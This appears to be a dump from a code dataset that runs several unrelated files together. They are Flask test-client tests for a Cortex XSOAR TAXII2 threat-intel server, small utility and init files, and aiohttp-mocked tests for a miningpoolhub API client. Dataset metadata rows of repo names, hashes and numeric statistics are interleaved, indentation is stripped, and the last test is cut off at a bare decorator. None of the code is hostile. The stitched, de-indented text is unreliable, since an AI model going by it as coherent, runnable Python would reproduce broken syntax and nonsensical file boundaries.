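The parametrized cases above fully pin down the expected mapping. A hypothetical re-implementation consistent with that table; the real `create_fields_list` lives in TAXII2Server and may differ in details:

```python
def create_fields_list_sketch(fields):
    # '' -> default field set; 'all' -> empty set (no filtering);
    # 'value' and 'indicator_type' are aliases for 'name' and 'type'.
    if not fields:
        return {"name", "type"}
    if fields == "all":
        return set()
    aliases = {"value": "name", "indicator_type": "type"}
    return {aliases.get(field.strip(), field.strip()) for field in fields.split(",")}
```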
@pytest.mark.parametrize('headers', [{'Authorization': _basic_auth_str("user", "pwd")}, {}])
def test_taxii_wrong_auth(mocker, headers, taxii2_server_v20):
"""
Given
Taxii server v2.0
When
Getting server discovery, with wrong auth
Then
Validate that the error and status code are right
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get('/taxii/', headers=headers)
assert response.status_code == 401
assert response.json == {'title': 'Authorization failed'}
@pytest.mark.parametrize('headers', [{'Authorization': _basic_auth_str("username", "password")},
{'Authorization': _basic_auth_str("username", "password"),
'Accept': 'wrong_type'}])
def test_taxii_wrong_accept(mocker, headers, taxii2_server_v20):
"""
Given
Taxii server v2.0
When
Getting server discovery, with wrong accept header
Then
Validate that the error and status code are right
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get('/taxii/', headers=headers)
assert response.status_code == 406
def test_taxii20_server_discovery(mocker, taxii2_server_v20):
"""
Given
Taxii server v2.0
When
Getting server discovery
Then
Validate that the discovery output as expected
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/taxii/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json.get('default') == 'http://demisto:7000/threatintel/'
def test_taxii21_server_discovery(mocker, taxii2_server_v21):
"""
Given
Taxii server v2.1
When
Call server discovery api request
Then
Validate that the discovery output as expected
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
with APP.test_client() as test_client:
response = test_client.get('/taxii/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json.get('default') == 'http://demisto:7000/threatintel/'
def test_taxii20_api_root(mocker, taxii2_server_v20):
"""
Given
TAXII v2.0 server, api_root
When
Call api_root api request
Then
Validate that the api_root information returned as expected
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json.get('title') == 'Cortex XSOAR TAXII2 Server ThreatIntel'
def test_taxii_wrong_api_root(mocker, taxii2_server_v20):
"""
Given
Taxii server v2.0, a non-existing api_root
When
Getting api root information, for wrong api_root
Then
Validate that the error and status code are right
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get('/not_existing_api_root/', headers=HEADERS)
assert response.status_code == 404
assert response.json.get('title') == 'Unknown API Root'
def test_taxii20_status(mocker, taxii2_server_v20):
"""
Given
Status api call
When
Calling a status request
Then
Validate the error returned.
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/status/1223456/', headers=HEADERS)
assert response.status_code == 404
def test_taxii20_collections(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0
When
Calling collections api request
Then
Validate that collections returned as expected
"""
collections = util_load_json('test_files/collections20.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json == collections
def test_taxii21_collections(mocker, taxii2_server_v21):
"""
Given
TAXII Server v2.1
When
Calling collections api request
Then
Validate that collections returned as expected
"""
collections = util_load_json('test_files/collections21.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == collections
def test_taxii20_collection(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0, collection_id
When
Calling collection by id api request
Then
Validate that right collection returned
"""
collections = util_load_json('test_files/collections20.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json == collections.get('collections')[0]
def test_taxii21_collection(mocker, taxii2_server_v21):
"""
Given
TAXII Server v2.1, collection_id
When
Calling collection by id api request
Then
Validate that right collection returned
"""
collections = util_load_json('test_files/collections21.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == collections.get('collections')[0]
def test_taxii_wrong_collection_id(mocker, taxii2_server_v21):
"""
Given
Taxii server v2.1, a non-existing collection_id
When
Getting collection information, for wrong collection_id
Then
Validate that the error and status code are right
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/not_existing_collection_id/', headers=HEADERS)
assert response.status_code == 404
assert response.json.get('title') == 'Unknown Collection'
def test_taxii20_manifest(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0, collection_id, range
When
Calling manifest api request for given collection
Then
Validate that right manifest returned.
"""
iocs = util_load_json('test_files/ip_iocs.json')
manifest = util_load_json('test_files/manifest20.json')
headers = copy.deepcopy(HEADERS)
headers['Range'] = 'items 0-4'
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/manifest/',
headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json == manifest
def test_taxii21_manifest(mocker, taxii2_server_v21):
"""
Given
TAXII Server v2.1, collection_id
When
Calling manifest api request for given collection
Then
Validate that right manifest returned.
"""
iocs = util_load_json('test_files/ip_iocs.json')
manifest = util_load_json('test_files/manifest21.json')
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/manifest/?limit=4',
headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == manifest
def test_taxii20_objects(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0, collection_id, content-range
When
Calling the get objects API request for the given collection
Then
Validate that the right objects are returned.
"""
iocs = util_load_json('test_files/ip_iocs.json')
objects = util_load_json('test_files/objects20.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(uuid, 'uuid4', return_value='1ffe4bee-95e7-4e36-9a17-f56dbab3c777')
headers = copy.deepcopy(HEADERS)
headers['Content-Range'] = 'items 0-2/5'
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/objects/',
headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.stix+json; version=2.0'
assert response.json == objects
assert response.headers.get('Content-Range') == 'items 0-2/5'
def test_taxii20_indicators_objects(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0, collection_id, content-range, types_for_indicator_sdo
When
Calling the get objects API request for the given collection
Then
Validate that the right objects are returned.
"""
iocs = util_load_json('test_files/ip_iocs.json')
objects = util_load_json('test_files/objects20-indicators.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch('TAXII2Server.SERVER.types_for_indicator_sdo', [
'ipv4-addr', 'domain-name', 'ipv6-addr', 'user-account',
'email-addr', 'windows-registry-key', 'file', 'url'])
mocker.patch.object(uuid, 'uuid4', return_value='1ffe4bee-95e7-4e36-9a17-f56dbab3c777')
headers = copy.deepcopy(HEADERS)
headers['Content-Range'] = 'items 0-2/5'
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/objects/',
headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.stix+json; version=2.0'
assert response.json == objects
assert response.headers.get('Content-Range') == 'items 0-2/5'
@pytest.mark.parametrize('demisto_iocs_file,res_file,query_type', [
('malware_iocs', 'objects21_malware', 'malware'),
('file_iocs', 'objects21_file', 'file'),
('domain_iocs', 'objects21_domain', 'domain-name,attack-pattern')
])
def test_taxii21_objects(mocker, taxii2_server_v21, demisto_iocs_file, res_file, query_type):
"""
Given
TAXII Server v2.1, collection_id, limit, next, type parameter
When
Calling the get objects API request for the given collection
Then
Validate that the right objects are returned.
"""
iocs = util_load_json(f'test_files/{demisto_iocs_file}.json')
objects = util_load_json(f'test_files/{res_file}.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch.object(uuid, 'uuid4', return_value='1ffe4bee-95e7-4e36-9a17-f56dbab3c777')
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/e46189b5-c5c8-5c7f-b947-183e0302b4d3/'
f'objects/?match[type]={query_type}&limit=2&next=1', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == objects
@pytest.mark.parametrize('api_request', [
'objects', 'manifest'
])
def test_taxii21_bad_request(mocker, taxii2_server_v21, api_request):
"""
Given
TAXII Server v2.1, unsupported filter.
When
Calling the get objects or manifest API request for the given collection
Then
Validate that the right error is returned.
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'params', return_value={'res_size': '2500'})
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get(f'/threatintel/collections/e46189b5-c5c8-5c7f-b947-183e0302b4d3/'
f'{api_request}/?match[version]=3', headers=HEADERS)
assert response.status_code == 404
assert response.content_type == 'application/taxii+json;version=2.1'
assert 'Filtering by ID or version is not supported.' in response.json.get('description')
@pytest.mark.parametrize('api_request', [
'objects', 'manifest'
])
def test_taxii20_bad_content_range(mocker, taxii2_server_v20, api_request):
"""
Given
TAXII Server v2.0, unsupported range.
When
Calling the get objects or manifest API request for the given collection
Then
Validate that the right error is returned.
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'params', return_value={'res_size': '2500'})
headers = copy.deepcopy(HEADERS)
headers['Content-Range'] = 'items 8-2/10'
with APP.test_client() as test_client:
response = test_client.get(f'/threatintel/collections/e46189b5-c5c8-5c7f-b947-183e0302b4d3/'
f'{api_request}/', headers=headers)
assert response.status_code == 416
@pytest.mark.parametrize('res_file,fields,has_extension', [
('objects21_no_extention_file', {'name', 'type'}, False),
('objects21_spec_fields_file', {'sha1'}, True)])
def test_taxii21_objects_filtered_params(mocker, taxii2_server_v21, res_file, fields, has_extension):
"""
Given
TAXII Server v2.1, collection_id, type parameter, filtered_fields params
When
Calling the get objects API request for the given collection
Then
Validate that the right objects are returned.
"""
iocs = util_load_json('test_files/file_iocs.json')
objects = util_load_json(f'test_files/{res_file}.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch('TAXII2Server.SERVER.fields_to_present', fields)
mocker.patch('TAXII2Server.SERVER.has_extension', has_extension)
mocker.patch.object(uuid, 'uuid4', return_value='1ffe4bee-95e7-4e36-9a17-f56dbab3c777')
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/e46189b5-c5c8-5c7f-b947-183e0302b4d3/'
'objects/?match[type]=file', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == objects
# tests/test_fallback_or.py (python-pipe/hellp, MIT)
from sspipe import p, px
def test_divide_fallback():
assert (dict(x=2, y=3).keys() / p(list) | p(set)) == {'x', 'y'}
assert (dict(x=2, y=3).values() / p(list) | p(set)) == {2, 3}
# examples/AMDAutomation/dev/dev-tools/generate.py (YuudachiXMMY/BenchmarkAutomation, MIT)
pyinstaller --distpath="./build/release" --workpath="./build/release" --specpath="./build/release" -i="C:\Users\Navi\Desktop\BMAutomation\examples\AMDAutomation\dev\Huskies.ico" -F app.py
"Apache-2.0"
] | null | null | null | tests/integration/constants.py | bk521234/fables | 6e3d461c597610ae2e954a0d30869e1e962d69a4 | [
"Apache-2.0"
] | null | null | null | tests/integration/constants.py | bk521234/fables | 6e3d461c597610ae2e954a0d30869e1e962d69a4 | [
"Apache-2.0"
] | null | null | null | import os
DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
HRIS_DATA_DIR = os.path.join(DATA_DIR, "hris")
| 19.666667 | 58 | 0.728814 | 21 | 118 | 3.714286 | 0.428571 | 0.269231 | 0.230769 | 0.333333 | 0.435897 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 118 | 5 | 59 | 23.6 | 0.735849 | 0 | 0 | 0 | 0 | 0 | 0.067797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c6070e0ea6872e4bb09c03c92f625e6eb1017614 | 82 | py | Python | lightning_plus/api_basebone/restful/relation/__init__.py | twocucao/lightning-plus | e69c81da9c15fdfc37355e0362ff7ed804e94b2a | [
"MIT"
] | 1 | 2021-04-15T14:52:12.000Z | 2021-04-15T14:52:12.000Z | lightning_plus/api_basebone/restful/relation/__init__.py | twocucao/lightning | e69c81da9c15fdfc37355e0362ff7ed804e94b2a | [
"MIT"
] | null | null | null | lightning_plus/api_basebone/restful/relation/__init__.py | twocucao/lightning | e69c81da9c15fdfc37355e0362ff7ed804e94b2a | [
"MIT"
] | null | null | null | from .reverse_m2m import reverse_many_to_many
__all__ = ["reverse_many_to_many"]
| 20.5 | 45 | 0.829268 | 13 | 82 | 4.384615 | 0.538462 | 0.385965 | 0.45614 | 0.596491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013514 | 0.097561 | 82 | 3 | 46 | 27.333333 | 0.756757 | 0 | 0 | 0 | 0 | 0 | 0.243902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c6426cad430c9e0d4d1a54210e489568bbfbde30 | 30 | py | Python | code/main.py | ramonduarte/ellectoral-college-br | ca3e74e5d63deb8f9344d31eb6f65283cb4c5f2f | [
"MIT"
] | null | null | null | code/main.py | ramonduarte/ellectoral-college-br | ca3e74e5d63deb8f9344d31eb6f65283cb4c5f2f | [
"MIT"
] | null | null | null | code/main.py | ramonduarte/ellectoral-college-br | ca3e74e5d63deb8f9344d31eb6f65283cb4c5f2f | [
"MIT"
] | null | null | null | import pandas as pd
print(pd)
# src/packagescripts/python_arrow_version.py (davidanthoff/csv-comparison, MIT)
import pyarrow
print(pyarrow.__version__)
# tests/test_miningpoolhub_py.py (CoryKrol/miningpoolhub_py, Apache-2.0)
import aiohttp
import json
from miningpoolhub_py.exceptions import (
APIError,
APIRateLimitError,
InvalidCoinError,
UnauthorizedError,
)
from miningpoolhub_py import MiningPoolHubAPI
import pytest
from aioresponses import aioresponses
NOT_ALL_KEYS_PRESENT = "All keys should be in the response"
GET_USER_BALANCES_URL = "https://ethereum.miningpoolhub.com/index.php?action=getuserbalance&api_key=test&page=api"
GET_AUTO_SWITCHING_URL = "https://miningpoolhub.com/index.php?action=getautoswitchingandprofitsstatistics&page=api"
CONTENT_HEADERS = {"Content-Type": "text/html"}
ETHEREUM = "ethereum"
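# The mocked URLs in the tests below all follow a single pattern. As an
# illustrative sketch (a hypothetical helper, not part of miningpoolhub_py or
# of this test suite), the endpoint for a given coin and action could be built
# like this:

```python
def build_mph_url(coin_name: str, action: str, api_key: str = "test") -> str:
    """Build a miningpoolhub endpoint URL matching the pattern mocked in these tests."""
    return (
        f"https://{coin_name}.miningpoolhub.com/index.php"
        f"?action={action}&api_key={api_key}&page=api"
    )
```

# e.g. build_mph_url("ethereum", "getuserbalance") reproduces GET_USER_BALANCES_URL above.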
@pytest.mark.asyncio
async def test_unauthorized_api_key():
"""Tests an API call with a bad API key"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(GET_USER_BALANCES_URL, status=401)
with pytest.raises(UnauthorizedError):
await miningpoolhubapi.async_get_user_balance(coin_name=ETHEREUM)
await session.close()
@pytest.mark.asyncio
async def test_bad_coin_name(get_auto_switching_and_profits_statistics_response):
"""Tests an API call with a non-existent coin name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://doggy_coin.miningpoolhub.com/index.php?action=getuserbalance&api_key=test&page=api",
exception=aiohttp.ClientConnectionError(),
)
m.get(
GET_AUTO_SWITCHING_URL,
status=200,
body=json.dumps(get_auto_switching_and_profits_statistics_response),
headers=CONTENT_HEADERS,
)
with pytest.raises(InvalidCoinError):
await miningpoolhubapi.async_get_user_balance(coin_name="doggy_coin")
await session.close()
@pytest.mark.asyncio
async def test_bad_connection():
"""Tests an API call with a bad connection, to distinguish from a bad coin name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(GET_USER_BALANCES_URL, exception=aiohttp.ClientConnectionError())
m.get(
"https://miningpoolhub.com/index.php?action=getautoswitchingandprofitsstatistics&api_key=test&page=api",
exception=aiohttp.ClientConnectionError(),
)
with pytest.raises(aiohttp.ClientConnectionError):
await miningpoolhubapi.async_get_user_balance(coin_name=ETHEREUM)
await session.close()
@pytest.mark.asyncio
async def test_api_rate_limit(api_rate_limit_response):
"""Tests an API call with a non-existent coin name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
GET_USER_BALANCES_URL,
status=200,
body=api_rate_limit_response,
headers=CONTENT_HEADERS,
)
with pytest.raises(APIRateLimitError):
await miningpoolhubapi.async_get_user_balance(coin_name=ETHEREUM)
await session.close()
@pytest.mark.asyncio
async def test_get_block_count(get_block_count_response):
"""Tests an API call to get block count data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getblockcount&api_key=test&page=api",
status=200,
body=json.dumps(get_block_count_response),
headers=CONTENT_HEADERS,
)
resp = await miningpoolhubapi.async_get_block_count(coin_name=ETHEREUM)
assert isinstance(resp, int)
assert resp == 13503059
await session.close()
@pytest.mark.asyncio
async def test_get_block_stats(get_block_stats_keys, get_block_stats_response):
"""Tests an API call to get block stats data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getblockstats&api_key=test&page=api",
status=200,
payload=get_block_stats_response,
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_block_stats(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_block_stats_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_blocks_found(get_blocks_found_keys, get_blocks_found_response):
"""Tests an API call to get blocks found data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getblocksfound&api_key=test&page=api",
status=200,
body=json.dumps(get_blocks_found_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_blocks_found(coin_name=ETHEREUM)
assert isinstance(result, list)
assert isinstance(result[0], dict)
assert set(get_blocks_found_keys).issubset(
result[0].keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_current_workers(get_current_workers_response):
"""Tests an API call to get current worker hash rate data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getcurrentworkers&api_key=test&page=api",
status=200,
body=json.dumps(get_current_workers_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_current_workers(coin_name=ETHEREUM)
assert isinstance(result, int)
assert result == 190057
await session.close()
@pytest.mark.asyncio
async def test_get_dashboard(get_dashboard_keys, get_dashboard_data_response):
"""Tests an API call to get dashboard data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getdashboarddata&api_key=test&page=api",
status=200,
body=json.dumps(get_dashboard_data_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_dashboard(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert (
result["pool"]["info"]["currency"] == "ETH"
), "The coin name should be in the response"
assert (
result["balance_on_exchange"] is not None
), "Balance on exchange should not be null"
assert result["balance_on_exchange"] == 0.1
assert (
result["personal"]["shares"]["valid"] is not None
), "Valid shares should not be null"
assert result["personal"]["shares"]["valid"] == 12288
assert (
result["personal"]["shares"]["invalid"] is not None
), "Invalid shares should not be null"
assert result["personal"]["shares"]["invalid"] == 1
assert (
result["pool"]["shares"]["valid"] is not None
), "Valid shares should not be null"
assert result["pool"]["shares"]["valid"] == 2287112448
assert (
result["pool"]["shares"]["invalid"] is not None
), "Invalid shares should not be null"
assert result["pool"]["shares"]["invalid"] == 2129568
assert set(get_dashboard_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_dashboard_null_balance_on_exchange(
get_dashboard_keys, get_dashboard_data_response
):
"""Tests an API call to get dashboard data for a coin_name"""
get_dashboard_data_response["getdashboarddata"]["data"][
"balance_on_exchange"
] = None
get_dashboard_data_response["getdashboarddata"]["data"]["personal"]["shares"][
"valid"
] = None
get_dashboard_data_response["getdashboarddata"]["data"]["personal"]["shares"][
"invalid"
] = None
get_dashboard_data_response["getdashboarddata"]["data"]["pool"]["shares"][
"valid"
] = None
get_dashboard_data_response["getdashboarddata"]["data"]["pool"]["shares"][
"invalid"
] = None
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getdashboarddata&api_key=test&page=api",
status=200,
body=json.dumps(get_dashboard_data_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_dashboard(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert (
result["pool"]["info"]["currency"] == "ETH"
), "The coin name should be in the response"
assert (
result["balance_on_exchange"] is not None
), "Balance on exchange should not be null"
assert result["balance_on_exchange"] == 0.0
assert (
result["personal"]["shares"]["valid"] is not None
), "Valid shares should not be null"
assert result["personal"]["shares"]["valid"] == 0
assert (
result["personal"]["shares"]["invalid"] is not None
), "Invalid shares should not be null"
assert result["personal"]["shares"]["invalid"] == 0
assert (
result["pool"]["shares"]["valid"] is not None
), "Valid shares should not be null"
assert result["pool"]["shares"]["valid"] == 0
assert (
result["pool"]["shares"]["invalid"] is not None
), "Invalid shares should not be null"
assert result["pool"]["shares"]["invalid"] == 0
assert set(get_dashboard_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_difficulty(get_difficulty_response):
"""Tests an API call to get difficulty data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getdifficulty&api_key=test&page=api",
status=200,
body=json.dumps(get_difficulty_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_difficulty(coin_name=ETHEREUM)
assert isinstance(result, int)
assert result == 10248372611623184
await session.close()
@pytest.mark.asyncio
async def test_get_estimated_time(get_estimated_time_response):
"""Tests an API call to get estimated time for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getestimatedtime&api_key=test&page=api",
status=200,
body=json.dumps(get_estimated_time_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_estimated_time(coin_name=ETHEREUM)
assert isinstance(result, int)
assert result == 2059292915976
await session.close()
@pytest.mark.asyncio
async def test_get_hourly_hash_rate(
get_hourly_hash_rate_keys, get_hourly_hash_rates_response
):
"""Tests an API call to get hourly hash rate data for a pool"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=gethourlyhashrates&api_key=test&page=api",
status=200,
body=json.dumps(get_hourly_hash_rates_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_hourly_hash_rate(coin_name=ETHEREUM)
assert isinstance(result, list)
assert isinstance(result[0], dict)
assert set(get_hourly_hash_rate_keys).issubset(
result[0].keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_nav_bar_data(get_nav_bar_data_response):
"""Tests an API call to get nav bar data for a pool"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getnavbardata&api_key=test&page=api",
status=200,
body=json.dumps(get_nav_bar_data_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_nav_bar_data(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert result["error"] == "disabled", "The endpoint is disabled"
await session.close()
@pytest.mark.asyncio
async def test_get_pool_hash_rate(get_pool_hash_rate_response):
"""Tests an API call to get pool hash rate"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getpoolhashrate&api_key=test&page=api",
status=200,
body=json.dumps(get_pool_hash_rate_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_pool_hash_rate(coin_name=ETHEREUM)
assert isinstance(result, float)
assert result == 21318913068.661
await session.close()
@pytest.mark.asyncio
async def test_get_pool_info(get_pool_info_keys, get_pool_info_response):
"""Tests an API call to get pool info"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getpoolinfo&api_key=test&page=api",
status=200,
body=json.dumps(get_pool_info_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_pool_info(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_pool_info_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
